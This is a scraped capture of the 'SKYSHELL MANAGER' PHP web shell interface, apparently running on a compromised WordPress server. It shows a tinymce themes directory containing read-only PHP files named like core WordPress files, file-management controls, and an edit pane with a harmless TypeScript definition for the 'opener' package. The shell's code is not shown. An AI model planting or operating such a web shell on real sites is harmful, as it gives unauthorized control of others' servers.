📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.d.ts
// Type definitions for opener 1.4 // Project: https://github.com/domenic/opener // Definitions by: Rahul Ravikumar <https://github.com/tikurahul> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped /// <reference types='node' /> import { ChildProcess } from 'child_process'; type Callback = (error: Error, stdout: string, stderr: string) => void; declare function opener( args: string | string[], options?: {}, callback?: Callback): ChildProcess; export = opener;
Save